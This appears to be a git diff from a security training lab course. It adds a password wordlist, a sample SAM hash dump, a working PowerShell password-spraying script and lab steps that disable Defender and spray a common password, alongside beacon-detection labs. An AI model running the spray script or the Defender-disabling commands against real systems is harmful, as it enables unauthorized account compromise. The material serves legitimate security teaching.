+ggeorge
+glider1
+gone
+hawk
+heikki
+histoire
+hugh
+if6was9
+ingvar
+jan
+jedi
+jimi
+juhani
+khan
+lima
+midvale
+neko
+nesbit
+nexus6
+nisse
+notta1
+pam
+park
+pole
+pope
+pyro
+ram
+reliant
+rex
+rush
+seoul
+skip
+stan
+sue
+suzy
+tab
+testi
+thelorax
+tika
+tnt
+toto1
+tre
+wind
+x-men
+xyz
+zxc
+369
+Abcdef
+Asdfgh
+Changeme
+NCC1701
+Zxcvbnm
+demo
+doom2
+e
+good-luck
+homebrew
+m1911a1
+nat
+ne1410s
+ne14a69
+zhongguo
+sample123
+0852
+basf
+OU812
+!@#$%
+informix
+majordomo
+news
+temp
+trek
+!@#$%^
+!@#$%^&*
+Pentium
+Raistlin
+adi
+bmw
+law
+m
+new
+opus
+plus
+visa
+www
+y
+zzz
+1332
+1950
+3141
+3533
+4055
+4854
+6301
+Bonzo
+ChangeMe
+Front242
+Gretel
+Michel1
+Noriko
+Sidekick
+Sverige
+Swoosh
+Woodrow
+aa
+ayelet
+barn
+betacam
+biz
+boat
+cuda
+doc
+hal
+hallowell
+haro
+hosehead
+i
+ilmari
+irmeli
+j1l2t3
+jer
+kcin
+kerrya
+kissa2
+leaf
+lissabon
+mart
+matti1
+mech
+morecats
+paagal
+performa
+prof
+ratio
+ship
+slip
+stivers
+tapani
+targas
+test2
+test3
+tula
+unix
+user1
+xanth
+!@#$%^&
+1701d
+@#$%^&
+Qwert
+allo
+dirk
+go
+newcourt
+nite
+notused
+sss
diff --git a/IntroClassFiles/Tools/IntroClass/PasswordCracking/sam.txt b/IntroClassFiles/Tools/IntroClass/PasswordCracking/sam.txt
new file mode 100644
index 00000000..a9811cd3
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/PasswordCracking/sam.txt
@@ -0,0 +1,10 @@
+adhd:1000:aad3b435b51404eeaad3b435b51404ee:434db24baf9270299080b205b2b5e16b:::
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+allowlist:1203:aad3b435b51404eeaad3b435b51404ee:434db24baf9270299080b205b2b5e16b:::
+bill:1802:aad3b435b51404eeaad3b435b51404ee:c4ddb64252adfc9e0558353099ded495:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+jenny:1803:aad3b435b51404eeaad3b435b51404ee:1c2f7f3b20a7a3c512c72c6551d5c8ae:::
+john:1801:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
+leo:1804:aad3b435b51404eeaad3b435b51404ee:08942f2b090225613f4da5ae3e920bc5:::
+neo:1805:aad3b435b51404eeaad3b435b51404ee:3ceb5ce361663e50b09a7768e5770e0e:::
diff --git a/200-user-gen.bat b/IntroClassFiles/Tools/IntroClass/PasswordSpray/200-user-gen.bat
similarity index 100%
rename from 200-user-gen.bat
rename to IntroClassFiles/Tools/IntroClass/PasswordSpray/200-user-gen.bat
diff --git a/IntroClassFiles/Tools/IntroClass/PasswordSpray/LocalPasswordSpray.ps1 b/IntroClassFiles/Tools/IntroClass/PasswordSpray/LocalPasswordSpray.ps1
new file mode 100644
index 00000000..852a4e64
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/PasswordSpray/LocalPasswordSpray.ps1
@@ -0,0 +1,64 @@
+function Invoke-LocalPasswordSpray {
+    Param(
+        [Parameter(Position = 1, Mandatory = $false)]
+        [string]$UserList = "C:\temp\UserList.txt",
+        [Parameter(Position = 2, Mandatory = $false)]
+        [string]$Password
+    )
+
+    # P/Invoke LogonUser directly - faster than PrincipalContext on Win11/2025
+    $signature = @'
+[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
+public static extern bool LogonUser(
+    string lpszUsername,
+    string lpszDomain,
+    string lpszPassword,
+    int dwLogonType,
+    int dwLogonProvider,
+    out IntPtr phToken);
+
+[DllImport("kernel32.dll", SetLastError = true)]
+public static extern bool CloseHandle(IntPtr hObject);
+'@
+
+    $AdvApi32 = Add-Type -MemberDefinition $signature -Name 'AdvApi32' -Namespace 'PInvoke' -PassThru
+
+    # LOGON32_LOGON_INTERACTIVE = 2, LOGON32_PROVIDER_DEFAULT = 0
+    # Try LOGON32_LOGON_NETWORK = 3 if interactive is throttled
+    $logonType = 3
+    $logonProvider = 0
+
+    $UserListExists = Test-Path $UserList
+    if (-not $UserListExists) {
+        Write-Host "##### Making a list of all local users #####"
+        New-Item -ItemType Directory -Path "C:\temp" -Force | Out-Null
+        $rawUsers = net user
+        $stripped = ($rawUsers | Select-Object -Skip 4 | Where-Object { $_ -notmatch 'The command completed successfully\.' })
+        $stripped.Trim() -replace '\s+', "`r`n" | Out-File -Encoding ascii C:\temp\UserList.txt
+    }
+
+    Write-Host "[*] Using $UserList as userlist"
+    $Users = Get-Content $UserList
+    $count = $Users.Count
+    $curr_user = 0
+    $time = Get-Date
+    Write-Host -ForegroundColor Yellow "[*] Password spraying started at $($time.ToShortTimeString())"
+
+    foreach ($User in $Users) {
+        $token = [IntPtr]::Zero
+        # Use "." for local machine context
+        $result = $AdvApi32::LogonUser($User, ".", $Password, $logonType, $logonProvider, [ref]$token)
+
+        if ($result) {
+            $null = $AdvApi32::CloseHandle($token)
+            Add-Content C:\temp\sprayed-creds.txt "$User`:$Password"
+            Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:$Password"
+        }
+
+        $curr_user++
+        Write-Host -NoNewline "$curr_user of $count users tested`r"
+    }
+
+    Write-Host -ForegroundColor Yellow "`n[*] Password spraying complete"
+    Write-Host -ForegroundColor Yellow "[*] Results saved to C:\temp\sprayed-creds.txt"
+}
diff --git a/IntroClassFiles/Tools/IntroClass/PasswordSpray/PasswordSpray.md b/IntroClassFiles/Tools/IntroClass/PasswordSpray/PasswordSpray.md
index 8be33166..b7c9ff00 100755
--- a/IntroClassFiles/Tools/IntroClass/PasswordSpray/PasswordSpray.md
+++ b/IntroClassFiles/Tools/IntroClass/PasswordSpray/PasswordSpray.md
@@ -3,39 +3,42 @@
 
 # Password Spray
 
-First things first, disable **Defender**. Open an instance of **Windows PowerShell** by clicking on the icon in the taskbar. Then run the following:
+First things first, disable **Defender**. Open an instance of **Windows PowerShell** by clicking on the icon in the **desktop**. Then run the following:
 
-![](attachments/OpeningPowershell.png)
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/5676575e-6ba5-4971-b1de-68d60234af47" />
 
-<pre>Set-MpPreference -DisableRealtimeMonitoring $true</pre>
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
 
 This will disable **Defender** for this session.
 
 If you get angry red errors, that is Ok, it means **Defender** is not running.
 
-Let's get started by opening a **Command Prompt** terminal by clicking on the icon in the taskbar.
+Let's get started by opening a **Command Prompt** terminal by clicking on the icon in the **desktop**.
+
+<img width="74" height="91" alt="image" src="https://github.com/user-attachments/assets/d7242bdb-1c7d-47fc-a214-26ab3d46af64" />
 
-![](attachments/OpeningWindowsCommandPrompt.png)
 
 Once the terminal opens, navigate into the appropriate directory by running the following command:
 
-<pre>cd \IntroLabs</pre>
+```bash
+cd \IntroLabs
+```
 
 We need to run the batch file named **200-user-gen** 
 
-First, let's get an updated version:
-
-<pre>curl -o 200-user-gen.bat https://raw.githubusercontent.com/strandjs/IntroLabs/refs/heads/master/200-user-gen.bat</pre>
-
-Now, we need to run it!
-
 Do so by typing the name of the batch file and hitting enter:
 
-<pre>200-user-gen.bat</pre>
+```bash
+200-user-gen.bat
+```
 
 It should look like this:
 
-<img width="980" height="410" alt="image" src="https://github.com/user-attachments/assets/a77f162f-2521-4de8-8f97-b091d9caca30" />
+<img width="385" height="482" alt="2026-03-26_09-21" src="https://github.com/user-attachments/assets/61c73044-6992-4bf9-b5af-2fe3ca08bab2" />
+
 
 
 Let this run all the way through. 
@@ -46,55 +49,69 @@ We will need to start **PowerShell** to run **"LocalPasswordSpray"**
 
 Launch it by typing the following and hitting enter:
 
-<pre>powershell</pre>
+```bash
+powershell
+```
 
 Run the following two commands:
 
-<pre>Set-ExecutionPolicy Unrestricted</pre>
+```ps
+Set-ExecutionPolicy Unrestricted
+```
 
-<pre>Import-Module .\LocalPasswordSpray.ps1</pre>
+```ps
+Import-Module .\LocalPasswordSpray.ps1
+```
 
 It should look like this:
 
-![](attachments/powershellcommands.png)
+<img width="815" height="179" alt="2026-03-26_09-22" src="https://github.com/user-attachments/assets/6cf93e86-6168-4c76-9512-c8f69352104f" />
+
 
 Let’s try some password spraying against the local system!
 
-<pre>Invoke-LocalPasswordSpray -Password Winter2025</pre>
+```ps
+Invoke-LocalPasswordSpray -Password Winter2025
+```
 
 It should look like this:
 
-<img width="773" height="479" alt="image" src="https://github.com/user-attachments/assets/da81e7e5-c713-4a02-ac87-326f9aa5f8f5" />
+<img width="598" height="256" alt="2026-02-23_14-55" src="https://github.com/user-attachments/assets/0e299d08-daa9-498a-bb1b-2b95dd8d5c1e" />
 
 
 We need to clean up and make sure the system is ready for the rest of the labs.
 
 Run the following two commands:
 
-<pre>exit</pre>
+```ps
+exit
+```
 
-<pre>user-remove.bat</pre>
+```bash
+user-remove.bat
+```
 
-![](attachments/exit.png)
+<img width="365" height="285" alt="2026-02-23_15-02_1" src="https://github.com/user-attachments/assets/c82559fb-6c47-4c76-a306-498c572da9fb" />
 
 Let this run all the way through. 
 
 **Even though it looks endless, it's not!**
 
-***
-***Continuing on to the next Lab?***
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
 
-***Finished with the Labs?***
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/Responder/Responder.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/PasswordCracking/PasswordCracking.md)</i></b>
 
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
 
 Please be sure to destroy the lab environment!
 
 [Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
 ---
 
 
diff --git a/user-remove.bat b/IntroClassFiles/Tools/IntroClass/PasswordSpray/user-remove.bat
similarity index 100%
rename from user-remove.bat
rename to IntroClassFiles/Tools/IntroClass/PasswordSpray/user-remove.bat
diff --git a/IntroClassFiles/Tools/IntroClass/Portspoof.md b/IntroClassFiles/Tools/IntroClass/Portspoof.md
deleted file mode 100644
index 743206be..00000000
--- a/IntroClassFiles/Tools/IntroClass/Portspoof.md
+++ /dev/null
@@ -1,166 +0,0 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
-
-
-Portspoof
-=========
-
-Website
--------
-
-<http://portspoof.org/>
-
-Description
------------
-
-Portspoof is meant to be a lightweight, fast, portable and secure addition to any firewall system or security system. The general goal of the program is to make the reconnaissance phase slow and bothersome for your attackers as much it is possible. This is quite a change to the standard aggressive Nmap scan, which will give a full view of your system's running services.
-
-By using all of the techniques mentioned below:
-
-* your attackers will have a tough time while trying to identify all of your listening services.
-* the only way to determine if a service is emulated is through a protocol probe (imagine probing protocols for 65k open ports!).
-* it takes more than 8 hours and 200MB of sent data in order to get all of the service banners for your system ( nmap -sV -p - equivalent).
-
----
-
-The Portspoof program's primary goal is to enhance OS security through a set of new techniques:
-
-* All TCP ports are always open
-
-Instead of informing an attacker that a particular port is CLOSED or FILTERED a system with Portspoof will return SYN+ACK for every port connection attempt.
-
-As a result it is impractical to use stealth (SYN, ACK, etc.) port scanning against your system, since all ports are always reported as OPEN. With this approach it is really difficult to determine if a valid software is listening on a particular port (check out the screenshots).
-
-* Every open TCP port emulates a service
-
-Portspoof has a huge dynamic service signature database, which will be used to generate responses to your offenders scanning software service probes.
-
-Scanning software usually tries to determine a service that is running on an open port. This step is mandatory if one would want to identify port numbers on which you are running your services on a system behind the Portspoof. For this reason Portspoof will respond to every service probe with a valid service signature, which is dynamically generated based on a service signature regular expression database.
-
-As a result an attacker will not be able to determine which port numbers your system is truly using.
-
-Install Location
-----------------
-
-`/usr/local/bin/portspoof`
-
-Config File Location
---------------------
-
-`/usr/local/etc/portspoof.conf`
-`/usr/local/etc/portspoof_signatures`
-
-Usage
------
-
-`~#` **`portspoof -h`**
-
-        Usage: portspoof [OPTION]...
-        Portspoof - service emulator / frontend exploitation framework.
-
-        -i			  ip : Bind to a particular  IP address
-        -p			  port : Bind to a particular PORT number
-        -s			  file_path : Portspoof service signature regex. file
-        -c			  file_path : Portspoof configuration file
-        -l			  file_path : Log port scanning alerts to a file
-        -f			  file_path : FUZZER_MODE - fuzzing payload file list
-        -n			  file_path : FUZZER_MODE - wrapping signatures file list
-        -1			  FUZZER_MODE - generate fuzzing payloads internally
-        -2			  switch to simple reply mode (doesn't work for Nmap)!
-        -D			  run as daemon process
-        -d			  disable syslog
-        -v			  be verbose
-        -h			  display this help and exit
-
-
-
-Example 1: Starting Portspoof
------------------------------
-
-Portspoof, when run, listens on a single port. By default this is port 4444. In order to fool a port scan, we have to allow Portspoof to listen on *every* port. To accomplish this we will use an `iptables` command that redirects every packet sent to any port to port 4444 where the Portspoof port will be listening. This allows Portspoof to respond on any port.
-
-First, let's become root:
-
-`sudo su -`
-
-Now, let's install portspoof
-
-`sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg`
-
-`apt-get update`
-
-`apt-get install portspoof`
-
-*Note, this may take a moment
-
-![image](https://github.com/user-attachments/assets/db0eeae1-d282-448d-b2e6-7b819a091971)
-
-Now, let's add the firewall rules.
-
-`iptables -t nat -A PREROUTING -p tcp -m tcp --dport 1:20 -j REDIRECT --to-ports 4444`
-
-Then run Portspoof with no options, which defaults it to "open port" mode. This mode will just return OPEN state for every connection attempt.
-
-`portspoof`
-
-![image](https://github.com/user-attachments/assets/1e2425d2-796a-4d20-8c05-393a551d1990)
-
-
-If you were to scan using Nmap from another Windows command prompt. Now you would see something like this:
-
-Note: You *must* run Nmap from a different machine. Scanning from the same machine will not reach Portspoof.
-
-Open a Windows command prompt:
-
-![image](https://github.com/user-attachments/assets/6f8f69a2-ff07-4deb-9f67-52f1fa5842a6)
-
-Then, run nmap:
-
-`nmap -p 1-10 <YOUR LINUX IP>`
-
-
-![image](https://github.com/user-attachments/assets/d51c7589-8fbf-4b0a-8c69-6c21629e588d)
-
-
-All ports are reported as open! When run this way, Nmap reports the service that typically runs on each port.
-
-To get more accurate results, an attacker might run an Nmap service scan, which would actively try to detect the services running. But performing an Nmap service detection scan shows that something is amiss because all ports are reported as running the same type of service.
-
-`nmap -p 1-10 -sV <YOUR LINUX IP>`
-
-![image](https://github.com/user-attachments/assets/148e82e4-f8fb-4df5-8fef-6b758d1e05e1)
-
-
-Example 2: Spoofing Service Signatures
---------------------------------------
-
-Showing all ports as open is all well and good. But the same thing could be accomplished with a simple netcat listener (`nc -l -k 4444`). To make things more interesting, how about we have Portspoof fool Nmap into actually detecting real services running?
-
-Let's kill the running version of portspoof with ctrl+c then restart it with signatures:
-
-`portspoof -s /etc/portspoof/portspoof_signatures`
-
-![image](https://github.com/user-attachments/assets/e1a2857a-7628-46d0-8808-b0af2add49f1)
-
-
-
-This mode will generate and feed port scanners like Nmap bogus service signatures.
-
-Now running an Nmap service detection scan against the top 100 most common ports (a common hacker activity) will turn up some very interesting results.
-
-`nmap -p 1-10 -sV 172.16.215.138`
-
-![image](https://github.com/user-attachments/assets/c4281e6f-4937-4477-b6a9-d2344d2a2699)
-
-
-Notice how all of the ports are still reported as open, but now Nmap reports a unique service on each port. This will either 1) lead an attacker down a rabbit hole investigating each port while wasting their time, or 2) the attacker may discard the results as false positives and ignore this machine altogether, leaving any legitimate service running untouched.
-
-Example 3: Cleaning Up
-----------------------
-
-To reset ADHD, you may reboot (recommended) or:
-
-1. Kill Portspoof by pressing Ctrl-C.
-2. Flush all iptables rules by running the command (as root): `sudo iptables -t nat -F`
-
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
diff --git a/IntroClassFiles/Tools/IntroClass/RITA/RITA.md b/IntroClassFiles/Tools/IntroClass/RITA/RITA.md
index 592b32ff..bd776270 100755
--- a/IntroClassFiles/Tools/IntroClass/RITA/RITA.md
+++ b/IntroClassFiles/Tools/IntroClass/RITA/RITA.md
@@ -1,4 +1,65 @@
 
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# RITA and AC Hunter
+
+In this lab, we are going to look at detecting command and control traffic on a network.
+
+We will be using **Real Intelligence Threat Analytics** (RITA) for this lab.
+
+To start we first need to open Windows File Explorer and navigate to the tools directory.
+
+First, open File Explorer:
+
+<img width="534" height="48" alt="OpenFileExplorer" src="https://github.com/user-attachments/assets/bd5ac519-825a-4921-bed6-3b8baf52a4b7" />
+
+Then, select the IntroLabs directory:
+
+![](attachments/rita_navintrolabs.png)
+
+Then, select rita-html-report:
+
+<img width="1116" height="535" alt="2026-02-23_15-18" src="https://github.com/user-attachments/assets/8a35fc63-ff0f-4cda-92fe-2d658131d050" />
+
+Then, select **index.html**:
+
+![](attachments/rita_navindex.png)
+
+Let’s select **VSAGENT-2017-3-15**.
+
+![](attachments/rita_vsagent.png)
+
+The tabs across the top allow you to review the output for all the different analysis modules of RITA.
+For **VSAgent** we will be focusing on **Beacons**, **Blacklisted** and **User Agents**.
+
+Please select the **Beacons** tab.
+
+![](attachments/rita_beaconview.png)
+
+Some backdoors have a very strong **“heartbeat”**. This is where a backdoor will constantly reconnect to get commands from an attacker at a specific interval. The interval consistency of the **“heartbeat”** is the TS score where a value of **1** is perfect. The top value in this set is the **VSAgent** communication. We will talk about the other connections in a few moments.
+
+We also have the number of connections. While some beacons have a **“strong”** heartbeat, they are very short in nature. Our VSAgent connection had a very large number of connections which had very strong intervals, while some of the others (e.g. the 64.4.54.253 addresses) had a strong **"heartbeat"**, but not as many connections. We will also talk about TS Duration. This is detecting how consistent each connection duration is. For example, if every connection is 2 seconds and there are 8000+ it would have a very strong **TS Duration** score.
+
+The other fields are statistical analysis fields showing things like mode range and skew.
+
+Now, lets navigate back to the first menu by clicking the **RITA** tab. 
+
+![](attachments/rita_rita.png)
+
+Then, select **DNSCat-2017-03-21**. We are going to review a backdoor which does not quite fit the same mold as **VSAgent**.
+
+![](attachments/rita_dnscat.png)
+
+This does not beacon back to a specific IP address, but rather it beacons through a DNS server. It is very crafty and will highlight how we can review the RAR compressed Bro logs used to generate the RITA data.
+
+We are going to jump right to the DNS tab. It gives us the clearest look at this backdoor.
+
+![](attachments/rita_dns.png)
+
+![](attachments/rita_dnsview.png)
+
+A couple of things should jump out at an investigator straight away. First, there were over 40K requests for **cat.nanobotninjas.com.** This is an absurd number for a specific domain. Sure, there are lots of requests for com and org and net and uk, but that is to be expected.
+
 Now, let's play with AC Hunter!
 
 Please go to 
@@ -54,7 +115,9 @@ Now, using **AC Hunter**, answer the following questions:
 3. For the dnscat2-ja3-strobe-agent dataset, what domain has the highest lookup count?
 4. Who is doing the lookups?
 
+
 ***                                                                 
+
 <b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/nessus/Nessus.md)</i></b>
 
 <b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/Wireshark/Wireshark.md)</i></b>
@@ -69,3 +132,5 @@ Please be sure to destroy the lab environment!
 
 ---
 
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/RITA.md b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/RITA.md
new file mode 100755
index 00000000..41d128d2
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/RITA.md
@@ -0,0 +1,140 @@
+
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# RITA and AC Hunter
+
+In this lab, we are going to look at detecting command and control traffic on a network.
+
+We will be using **Real Intelligence Threat Analytics** (RITA) for this lab.
+
+To start we first need to open Windows File Explorer and navigate to the tools directory.
+
+First, open File Explorer:
+
+<img width="534" height="48" alt="OpenFileExplorer" src="https://github.com/user-attachments/assets/bd5ac519-825a-4921-bed6-3b8baf52a4b7" />
+
+
+Then, select the IntroLabs directory:
+
+![](attachments/rita_navintrolabs.png)
+
+Then, select rita-html-report:
+
+<img width="1116" height="535" alt="2026-02-23_15-18" src="https://github.com/user-attachments/assets/8a35fc63-ff0f-4cda-92fe-2d658131d050" />
+
+Then, select **index.html**:
+
+![](attachments/rita_navindex.png)
+
+Let’s select **VSAGENT-2017-3-15**.
+
+![](attachments/rita_vsagent.png)
+
+The tabs across the top allow you to review the output for all the different analysis modules of RITA.
+For **VSAgent** we will be focusing on **Beacons**, **Blacklisted** and **User Agents**.
+
+Please select the **Beacons** tab.
+
+![](attachments/rita_beaconview.png)
+
+Some backdoors have a very strong **“heartbeat”**. This is where a backdoor will constantly reconnect to get commands from an attacker at a specific interval. The interval consistency of the **“heartbeat”** is the TS score where a value of **1** is perfect. The top value in this set is the **VSAgent** communication. We will talk about the other connections in a few moments.
+
+We also have the number of connections. While some beacons have a **“strong”** heartbeat, they are very short in nature. Our VSAgent connection had a very large number of connections which had very strong intervals, while some of the others (e.g. the 64.4.54.253 addresses) had a strong **"heartbeat"**, but not as many connections. We will also talk about TS Duration. This is detecting how consistent each connection duration is. For example, if every connection is 2 seconds and there are 8000+ it would have a very strong **TS Duration** score.
+
+The other fields are statistical analysis fields showing things like mode range and skew.
+
+Now, lets navigate back to the first menu by clicking the **RITA** tab. 
+
+![](attachments/rita_rita.png)
+
+Then, select **DNSCat-2017-03-21**. We are going to review a backdoor which does not quite fit the same mold as **VSAgent**.
+
+![](attachments/rita_dnscat.png)
+
+This does not beacon back to a specific IP address, but rather it beacons through a DNS server. It is very crafty and will highlight how we can review the RAR compressed Bro logs used to generate the RITA data.
+
+We are going to jump right to the DNS tab. It gives us the clearest look at this backdoor.
+
+![](attachments/rita_dns.png)
+
+![](attachments/rita_dnsview.png)
+
+A couple of things should jump out at an investigator straight away. First, there were over 40K requests for **cat.nanobotninjas.com.** This is an absurd number for a specific domain. Sure, there are lots of requests for com and org and net and uk, but that is to be expected.
+
+Now, let's play with AC Hunter!
+
+Please go to 
+
+<pre>https://training.aihhosted.com/</pre>
+
+You might be prompted by a warning stating that your connection isn't private. This is **Okay**. 
+
+Simply click **Advanced** and then click **Continue to trainin.aihhosted.com**
+
+![](attachments/advanced.png)
+
+The creds are:
+
+email = **training@blackhillsinfosec.com**
+
+PW = **gotbeacons?**
+
+![](attachments/rita_achunterlogin.png)
+
+When logged in, you will be prompted to select a dataset. 
+
+Select **vsagent** and hit confirm.
+
+![](attachments/rita_datasetselection.png)
+
+>[!NOTE]
+>
+>If this is not what you see, select the house icon in the bottom left of your screen, followed by the gear in the upper right.
+
+![](attachments/rita_wrongplace.png)
+
+This will open the overall scoring screen, as seen below. This screen allows you to see the systems that have the top scores across all areas from beacons to cyber deception.
+
+Please select **10.55.100.111**, then click on Beacon Score on the right.
+
+![](attachments/rita_selectingbeacon.png)
+
+This will open the beacon score for this system.
+
+![](attachments/rita_beaconscore.png)
+
+Notice the **histogram** on the bottom and the scoring criteria in the middle. 
+
+Notice how on the bottom you can see multiple aspects of this systems connections.  For example, you can see if there are any connections that had a threat intel hit, or if there are any connections that have beacons to a fully qualified domain.
+
+Now, using **AC Hunter**, answer the following questions:
+
+1. In the winlab-agent dataset, what is the connection interval for 10.10.98.30?
+
+2. In the gcat dataset, what is the historic fqdn for the beacon on 10.55.100.111?
+
+3. For the dnscat2-ja3-strobe-agent dataset, what domain has the highest lookup count?
+4. Who is doing the lookups?
+
+
+***                                                                 
+
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/Sysmon/Sysmon.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/Responder/Responder.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/AC_Hunter_Main_1.JPG b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/AC_Hunter_Main_1.JPG
new file mode 100644
index 00000000..b11a98ca
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/AC_Hunter_Main_1.JPG differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/BeaconScore_3.JPG b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/BeaconScore_3.JPG
new file mode 100644
index 00000000..10665b38
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/BeaconScore_3.JPG differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-16-58-09.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-16-58-09.png
new file mode 100755
index 00000000..a2ba6850
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-16-58-09.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-16-59-17.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-16-59-17.png
new file mode 100755
index 00000000..34ac8f1a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-16-59-17.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-00-10.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-00-10.png
new file mode 100755
index 00000000..b11434b3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-00-10.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-01-18.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-01-18.png
new file mode 100755
index 00000000..ce957578
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-01-18.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-08-00.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-08-00.png
new file mode 100755
index 00000000..7969f0b9
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-08-00.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-08-41.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-08-41.png
new file mode 100755
index 00000000..f717834e
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-08-41.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-00.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-00.png
new file mode 100755
index 00000000..8c23527a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-00.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-33.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-33.png
new file mode 100755
index 00000000..d3f9600f
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-33.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-56.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-56.png
new file mode 100755
index 00000000..9bd4f535
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/Clipboard_2020-07-07-17-09-56.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/DataSetSelection_2.JPG b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/DataSetSelection_2.JPG
new file mode 100644
index 00000000..66a6b4f5
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/DataSetSelection_2.JPG differ
diff --git a/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/OpeningFileExplorer.png b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/OpeningFileExplorer.png
new file mode 100644
index 00000000..7c3066b3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/RITAIntroClass/attachments/OpeningFileExplorer.png differ
